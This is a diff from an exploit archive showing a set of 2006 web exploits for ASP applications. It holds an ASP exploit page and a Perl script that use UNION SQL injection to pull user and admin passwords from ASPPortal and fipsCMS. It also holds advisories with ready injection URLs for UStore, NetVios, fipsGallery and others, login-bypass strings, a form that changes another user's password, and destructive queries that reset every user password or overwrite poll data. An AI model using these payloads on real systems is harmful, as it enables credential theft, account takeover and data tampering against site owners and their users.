print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
print "+ Exploit failed :(\n"; print "+ Exploit failed :(\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# milw0rm.com [2006-11-12] # milw0rm.com [2006-11-12]

384
platforms/asp/webapps/2762.asp
View file

@ -1,192 +1,192 @@
<% Response.Buffer = True %> <% Response.Buffer = True %>
<% On Error Resume Next %> <% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %> <% Server.ScriptTimeout = 100 %>
<% <%
'=============================================================================================== '===============================================================================================
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit '[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
'[Coded by : ajann '[Coded by : ajann
'[Author : ajann '[Author : ajann
'[Contact : :( '[Contact : :(
'[ExploitName: exploit1.asp '[ExploitName: exploit1.asp
'[Note : exploit file name =>exploit1.asp '[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click '[Using : Write Target and ID after Submit Click
'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün. '[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün.
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz '[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum. '[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
'=============================================================================================== '===============================================================================================
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke 'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke
%> %>
<html> <html>
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title> <title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>
<head> <head>
<script language="JavaScript"> <script language="JavaScript">
function functionControl1(){ function functionControl1(){
setTimeout("functionControl2()",2000); setTimeout("functionControl2()",2000);
} }
function functionControl2(){ function functionControl2(){
if(document.form1.field1.value==""){ if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again"); alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
} }
} }
function writetext() { function writetext() {
if(document.form1.field1.value==""){ if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>' document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
} }
} }
function write(){ function write(){
setTimeout("writetext()",1000); setTimeout("writetext()",1000);
} }
</script> </script>
</head> </head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000"> <body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center> <center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal &lt;=</b>v4.0.0(default1.asp) <u><b> <font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal &lt;=</b>v4.0.0(default1.asp) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br> Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr> <tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p> <font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User <b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td> ID=1]</b></font></td>
<td width="50%"><center> <td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get"> <form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080"> <input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td> <input type="submit" value="Get"></center></td>
</tr> </tr>
</table> </table>
<div id=htmlAlani></div> <div id=htmlAlani></div>
<% <%
islem = Request.QueryString("islem") islem = Request.QueryString("islem")
If islem = "hata1" Then If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If End If
If islem = "hata2" Then If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If End If
If islem = "hata3" Then If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If End If
%> %>
<% <%
If islem = "get" Then If islem = "get" Then
string1="default1.asp" string1="default1.asp"
string2="default1.asp" string2="default1.asp"
cek= Request.Form("id") cek= Request.Form("id")
targettext = Request.Form("text1") targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1) arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1) arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1") Response.Redirect("exploit1.asp?islem=hata1")
Else Else
If arama>0 then If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2") Response.Redirect("exploit1.asp?islem=hata2")
Else Else
If arama2=0 then If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3") Response.Redirect("exploit1.asp?islem=hata3")
Else Else
%> %>
<% <%
target1 = targettext+string1 target1 = targettext+string1
target2 = targettext+string2 target2 = targettext+string2
Public Function take(come) Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake With objtake
.Open "POST" , come, FALSE .Open "POST" , come, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded" .setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek .send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take = .Responsetext take = .Responsetext
End With End With
SET objtake = Nothing SET objtake = Nothing
End Function End Function
Public Function take1(come1) Public Function take1(come1)
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" ) Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake1 With objtake1
.Open "POST" , come1, FALSE .Open "POST" , come1, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded" .setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek .send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take1 = .Responsetext take1 = .Responsetext
End With End With
SET objtake1 = Nothing SET objtake1 = Nothing
End Function End Function
get_username = take(target1) get_username = take(target1)
get_password = take1(target2) get_password = take1(target2)
getdata=InStr(get_username,"Poll Question:</b>&nbsp;" ) getdata=InStr(get_username,"Poll Question:</b>&nbsp;" )
username=Mid(get_username,getdata+24,14) username=Mid(get_username,getdata+24,14)
passwd=Mid(get_password,getdata+24,14) passwd=Mid(get_password,getdata+24,14)
%> %>
<center> <center>
<font face="Verdana" size="2" color="#008000"> <u><b> <font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font> ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr> <tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">User Name:</font></b></td> <b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td> <td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
</tr> </tr>
<tr> <tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">&nbsp;User Password:</font></b></td> <b><font size="2" face="Arial">&nbsp;User Password:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td> <td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
</tr> </tr>
</table> </table>
<form method="POST" name="form2" action="#"> <form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p> <input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
</form> </form>
</center> </center>
<script language="JavaScript"> <script language="JavaScript">
write() write()
functionControl1() functionControl1()
</script> </script>
</body> </body>
</html> </html>
<% <%
End If End If
End If End If
End If End If
End If End If
Set objtake = Nothing Set objtake = Nothing
%> %>
# milw0rm.com [2006-11-12] # milw0rm.com [2006-11-12]

38
platforms/asp/webapps/2763.txt
View file

@ -1,19 +1,19 @@
******************************************************************************* *******************************************************************************
# Title : UStore 1.0 (detail.asp) Remote SQL Injection Vulnerability # Title : UStore 1.0 (detail.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Vendor: http://www.superfreaker.com/ # Vendor: http://www.superfreaker.com/
******************************************************************************* *******************************************************************************
###http://[target]/[path]//detail.asp?ID=[SQL] ###http://[target]/[path]//detail.asp?ID=[SQL]
Example: Example:
//detail.asp?ID=-1%20union%20select%200,username,password,0,0,0,0,0,0,0%20from%20tblusers%20where%20id%20like%201 //detail.asp?ID=-1%20union%20select%200,username,password,0,0,0,0,0,0,0%20from%20tblusers%20where%20id%20like%201
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-12] # milw0rm.com [2006-11-12]

44
platforms/asp/webapps/2764.txt
View file

@ -1,22 +1,22 @@
******************************************************************************* *******************************************************************************
# Title : USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability # Title : USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Vendor: http://www.superfreaker.com/ # Vendor: http://www.superfreaker.com/
# Dork : UPublisher # Dork : UPublisher
******************************************************************************* *******************************************************************************
###http://[target]/[path]//detail.asp?id=[SQL] ###http://[target]/[path]//detail.asp?id=[SQL]
Example: Example:
//detail.asp?id=11%20union%20select%200,username,password,0,0,0%20from%20tblusers //detail.asp?id=11%20union%20select%200,username,password,0,0,0%20from%20tblusers
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-12] # milw0rm.com [2006-11-12]

50
platforms/asp/webapps/2765.txt
View file

@ -1,25 +1,25 @@
******************************************************************************* *******************************************************************************
# Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection # Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection
Vulnerability Vulnerability
# Author : ajann # Author : ajann
# Dork : UPublisher # Dork : UPublisher
# Vendor: http://www.superfreaker.com/ # Vendor: http://www.superfreaker.com/
******************************************************************************* *******************************************************************************
###http://[target]/[path]//viewarticle.asp?ID=[SQL] ###http://[target]/[path]//viewarticle.asp?ID=[SQL]
Example: Example:
//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers //viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
OR --- OR ---
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers //viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-12] # milw0rm.com [2006-11-12]

72
platforms/asp/webapps/2772.htm
View file

@ -1,36 +1,36 @@
<!-- <!--
# Title : Online Event Registration <= v2.0 (save_profile.asp) Remote User Pass Change Exploit # Title : Online Event Registration <= v2.0 (save_profile.asp) Remote User Pass Change Exploit
# Author : ajann # Author : ajann
[Code]]] [Code]]]
--> -->
<html> <html>
<body bgcolor="#000000"> <body bgcolor="#000000">
<form method="POST" action="save_profile.asp?key=1&regkey="> <form method="POST" action="save_profile.asp?key=1&regkey=">
User Name<input type="hidden" name="UserID" size="4"> User Name<input type="hidden" name="UserID" size="4">
<input type="text" name="UserName" size="20" class="TBox" value="Demo Account" maxlength="40"> <input type="text" name="UserName" size="20" class="TBox" value="Demo Account" maxlength="40">
<input type="text" name="Company" size="40" class="TBox" value="Demo Account"> <input type="text" name="Company" size="40" class="TBox" value="Demo Account">
Email<input type="text" name="EmailAddress" size="40" class="TBox" value="demo@codewidgets.net" maxlength="40"> Email<input type="text" name="EmailAddress" size="40" class="TBox" value="demo@codewidgets.net" maxlength="40">
Phone<input type="text" name="Phone" size="20" class="TBox" value="780-429-2318" maxlength="14"> Phone<input type="text" name="Phone" size="20" class="TBox" value="780-429-2318" maxlength="14">
Fax<input type="text" name="Fax" size="20" class="TBox" value="780-429-2319"> Fax<input type="text" name="Fax" size="20" class="TBox" value="780-429-2319">
Password<input name="Password" size="20" class="TBox" value="demo" maxlength="10"> Password<input name="Password" size="20" class="TBox" value="demo" maxlength="10">
<input type="submit" value="Submit" name="B1" class="PButton"> <input type="submit" value="Submit" name="B1" class="PButton">
</form> </form>
</body> </body>
</html> </html>
<!-- <!--
[/Code]]] [/Code]]]
Change: <input type="hidden" name="UserID" size="4"> => ID Change: <input type="hidden" name="UserID" size="4"> => ID
Next Click "Profile" Next Click "Profile"
#ajann,Turkey #ajann,Turkey
#... #...
#Im Not Hacker! #Im Not Hacker!
--> -->
# milw0rm.com [2006-11-13] # milw0rm.com [2006-11-13]

38
platforms/asp/webapps/2774.txt
View file

@ -1,19 +1,19 @@
******************************************************************************* *******************************************************************************
# Title : Property Pro v1.0 (vir_Login.asp) Remote Login ByPass SQL Injection Vulnerability # Title : Property Pro v1.0 (vir_Login.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann # Author : ajann
******************************************************************************* *******************************************************************************
Example: Example:
###http://[target]/[path]/admin/ ###http://[target]/[path]/admin/
UserName: ' union select 0,0 from admin UserName: ' union select 0,0 from admin
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-13] # milw0rm.com [2006-11-13]

38
platforms/asp/webapps/2779.txt
View file

@ -1,19 +1,19 @@
******************************************************************************* *******************************************************************************
# Title : ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability # Title : ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann # Author : ajann
******************************************************************************* *******************************************************************************
Example: Example:
###http://[target]/[path]/admin/ ###http://[target]/[path]/admin/
UserName: ' union select 0,0,0,0,0,0,0,0 from categories UserName: ' union select 0,0,0,0,0,0,0,0 from categories
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-14] # milw0rm.com [2006-11-14]

40
platforms/asp/webapps/2780.txt
View file

@ -1,20 +1,20 @@
******************************************************************************* *******************************************************************************
# Title : NetVios <= 2.0 [News Application] (page.asp) Remote SQL Injection Vulnerability # Title : NetVios <= 2.0 [News Application] (page.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
******************************************************************************* *******************************************************************************
###http://[target]/[path]//page.asp?NewsID=[SQL] ###http://[target]/[path]//page.asp?NewsID=[SQL]
Example: Example:
//page.asp?NewsID=-1%20union%20select%200,0,0,logins,password,0,0,0%20from%20users%20where%20userid%20like%201 //page.asp?NewsID=-1%20union%20select%200,0,0,logins,password,0,0,0%20from%20users%20where%20userid%20like%201
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-14] # milw0rm.com [2006-11-14]

48
platforms/asp/webapps/2781.txt
View file

@ -1,24 +1,24 @@
blogme v3 [admin login bypass & xss (post)] blogme v3 [admin login bypass & xss (post)]
vendor site:http://www.drumster.net/ vendor site:http://www.drumster.net/
product:blogme v3 product:blogme v3
bug:login bypass & xss (post) bug:login bypass & xss (post)
risk:high risk:high
admin login bypass : admin login bypass :
user : ' or '1' = '1 user : ' or '1' = '1
passwd: 1'='1' ro ' passwd: 1'='1' ro '
xss post : xss post :
in: /comments.asp?blog=85 in: /comments.asp?blog=85
vulnerables fields: vulnerables fields:
- Name - Name
- URL - URL
- Comments - Comments
laurent gaffié & benjamin mossé laurent gaffié & benjamin mossé
http://s-a-p.ca/ http://s-a-p.ca/
contact: saps.audit@gmail.com contact: saps.audit@gmail.com
# milw0rm.com [2006-11-14] # milw0rm.com [2006-11-14]

44
platforms/asp/webapps/2782.txt
View file

@ -1,22 +1,22 @@
vendor site:http://hpe.net/ vendor site:http://hpe.net/
product:hpecs shopping cart product:hpecs shopping cart
bug:injection sql bug:injection sql
risk:high risk:high
login bypass : login bypass :
username: 'or''=' username: 'or''='
passwd: 'or''=' passwd: 'or''='
injection sql (post) : injection sql (post) :
http://site.com/search_list.asp http://site.com/search_list.asp
variables: variables:
Hpecs_Find=maingroup&searchstring='[sql] Hpecs_Find=maingroup&searchstring='[sql]
( or just post your query in the search engine ... ) ( or just post your query in the search engine ... )
laurent gaffié & benjamin mossé laurent gaffié & benjamin mossé
http://s-a-p.ca/ http://s-a-p.ca/
contact: saps.audit@gmail.com contact: saps.audit@gmail.com
# milw0rm.com [2006-11-14] # milw0rm.com [2006-11-14]

114
platforms/asp/webapps/2813.txt
View file

@ -1,57 +1,57 @@
******************************************************************************* *******************************************************************************
# Title : ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability # Title : ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# S.Page : http://www.aspnuke.com # S.Page : http://www.aspnuke.com
# D.Page : http://sourceforge.net/project/showfiles.php?group_id=92470 # D.Page : http://sourceforge.net/project/showfiles.php?group_id=92470
******************************************************************************* *******************************************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ASP Nuke ASP Nuke
Kenneth W. Richards Kenneth W. Richards
Orvado Technologies Orvado Technologies
-Introduction- -Introduction-
ASP Nuke is an open-source software application for running a ASP Nuke is an open-source software application for running a
community-based web site on a web server. community-based web site on a web server.
By open-source, we mean the code is freely available for others to read, By open-source, we mean the code is freely available for others to read,
modify and use in accordance modify and use in accordance
with the software license. with the software license.
ASP Nuke is an extensible framework that allows you to upgrade and add ASP Nuke is an extensible framework that allows you to upgrade and add
applications to the website quickly applications to the website quickly
and easily. It uses a modular architecture allowing others to rapidly and easily. It uses a modular architecture allowing others to rapidly
develop new modules and site operators develop new modules and site operators
to re-organize the layout and navigation for their site. to re-organize the layout and navigation for their site.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Vulnerability:: Vulnerability::
_________________ _________________
###http://[target]/[path]//module/account/register/register.asp?StateCode=[SQL]&..&..&..&..&..&..&..&..&.... ###http://[target]/[path]//module/account/register/register.asp?StateCode=[SQL]&..&..&..&..&..&..&..&..&....
Example = Poll Update Example = Poll Update
///module/account/register/register.asp?StateCode=0',0,0,0,0,0);update%20tblPoll%20set%20Question%20=%20'hacked'--&FirstName=namename1&LastName=namename2&Username=abcdefghijk&Password=1234567890&Confirm=1234567890&Address1=kro.mahallesi&Address2=kro.apt&City=aaaaaaaaa&ZipCode=101010101&CountryID=0&Email=mailmail@mailbidaamail.com&Action=ADD&_dummy=Register ///module/account/register/register.asp?StateCode=0',0,0,0,0,0);update%20tblPoll%20set%20Question%20=%20'hacked'--&FirstName=namename1&LastName=namename2&Username=abcdefghijk&Password=1234567890&Confirm=1234567890&Address1=kro.mahallesi&Address2=kro.apt&City=aaaaaaaaa&ZipCode=101010101&CountryID=0&Email=mailmail@mailbidaamail.com&Action=ADD&_dummy=Register
Note: Change UserName because ; failed:already username dont write. Note: Change UserName because ; failed:already username dont write.
Some tables,columns Some tables,columns
___________________ ___________________
[tblMember] | [FaqQuestion] [tblMember] | [FaqQuestion]
MemberID | QuestionID MemberID | QuestionID
Username | DocumentID Username | DocumentID
Password | Question Password | Question
Firstname | Answer Firstname | Answer
Middlename | Active Middlename | Active
EmailAddress | OrderNo EmailAddress | OrderNo
.. | .. .. | ..
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-19] # milw0rm.com [2006-11-19]

116
platforms/asp/webapps/2828.pl
View file

@ -1,58 +1,58 @@
#!/usr/bin/perl #!/usr/bin/perl
#[Script Name: fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit #[Script Name: fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
#[Coded by : ajann #[Coded by : ajann
#[Author : ajann #[Author : ajann
#[Contact : :( #[Contact : :(
use IO::Socket; use IO::Socket;
if(@ARGV < 3){ if(@ARGV < 3){
print " print "
[======================================================================== [========================================================================
[// fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit [// fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid] [// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1 [// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1 [// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann [// Vuln&Exp : ajann
[======================================================================== [========================================================================
"; ";
exit(); exit();
} }
#Local variables #Local variables
$server = $ARGV[0]; $server = $ARGV[0];
$server =~ s/(http:\/\/)//eg; $server =~ s/(http:\/\/)//eg;
$host = "http://".$server; $host = "http://".$server;
$port = "80"; $port = "80";
$dir = $ARGV[1]; $dir = $ARGV[1];
$file = "index.asp?lg=1&w=forumshow&fcat=-1&fansweres=True&froot=1&fid="; $file = "index.asp?lg=1&w=forumshow&fcat=-1&fansweres=True&froot=1&fid=";
$target = "-1%20union%20select%200,0,0,0,0,adminpword,0,0,0,0,0,0%20from%20admin%20where%20adminid%20like%20".$ARGV[2]; $target = "-1%20union%20select%200,0,0,0,0,adminpword,0,0,0,0,0,0%20from%20admin%20where%20adminid%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target; $target = $host.$dir.$file.$target;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n"; print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n"; print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n"; print $socket "Host: $server\n";
print $socket "Accept: */*\n"; print $socket "Accept: */*\n";
print $socket "Connection: close\n\n"; print $socket "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket>) { while($answer = <$socket>) {
if ($answer =~ /\"150\" value=\"Re:(.*?)class=\"/){ if ($answer =~ /\"150\" value=\"Re:(.*?)class=\"/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Password: $1\n"; print "+ Password: $1\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
print "+ Exploit failed :(\n"; print "+ Exploit failed :(\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# milw0rm.com [2006-11-22] # milw0rm.com [2006-11-22]

48
platforms/asp/webapps/2829.txt
View file

@ -1,24 +1,24 @@
******************************************************************************* *******************************************************************************
# Title : fipsGallery <= v1.5 (index1.asp) Remote SQL Injection Vulnerability # Title : fipsGallery <= v1.5 (index1.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Contact : :( # Contact : :(
# $$$ : 29 Euro # $$$ : 29 Euro
******************************************************************************* *******************************************************************************
###http://[target]/[path]//index1.asp?what=artists&which=[SQL] ###http://[target]/[path]//index1.asp?what=artists&which=[SQL]
Example: Example:
//index1.asp?what=artists&which=-1%20union%20select%200,username,password%20from%20admin //index1.asp?what=artists&which=-1%20union%20select%200,username,password%20from%20admin
See you Admin Hash.. See you Admin Hash..
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-22] # milw0rm.com [2006-11-22]

44
platforms/asp/webapps/2830.txt
View file

@ -1,22 +1,22 @@
******************************************************************************* *******************************************************************************
# Title : fipsForum <= v2.6 (default2.asp) Remote SQL Injection Vulnerability # Title : fipsForum <= v2.6 (default2.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Contact : :( # Contact : :(
******************************************************************************* *******************************************************************************
###http://[target]/[path]//default2.asp?kat=[SQL] ###http://[target]/[path]//default2.asp?kat=[SQL]
Example: Example:
//default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config //default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-22] # milw0rm.com [2006-11-22]

46
platforms/asp/webapps/2846.txt
View file

@ -1,23 +1,23 @@
******************************************************************************* *******************************************************************************
# Title : Liberum Help Desk <= 0.97.3 (details.asp) Remote SQL Injection Vulnerability # Title : Liberum Help Desk <= 0.97.3 (details.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Contact : :( # Contact : :(
# Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license # Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license
******************************************************************************* *******************************************************************************
###http://[target]/[path]//details.asp?id=[SQL] ###http://[target]/[path]//details.asp?id=[SQL]
Example: Example:
//details.asp?id=2)%20update%20tblusers%20set%20password='kro'-- //details.asp?id=2)%20update%20tblusers%20set%20password='kro'--
=> All Password Changed to "kro" => All Password Changed to "kro"
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-25] # milw0rm.com [2006-11-25]

24
platforms/asp/webapps/2848.txt
View file

@ -1,12 +1,12 @@
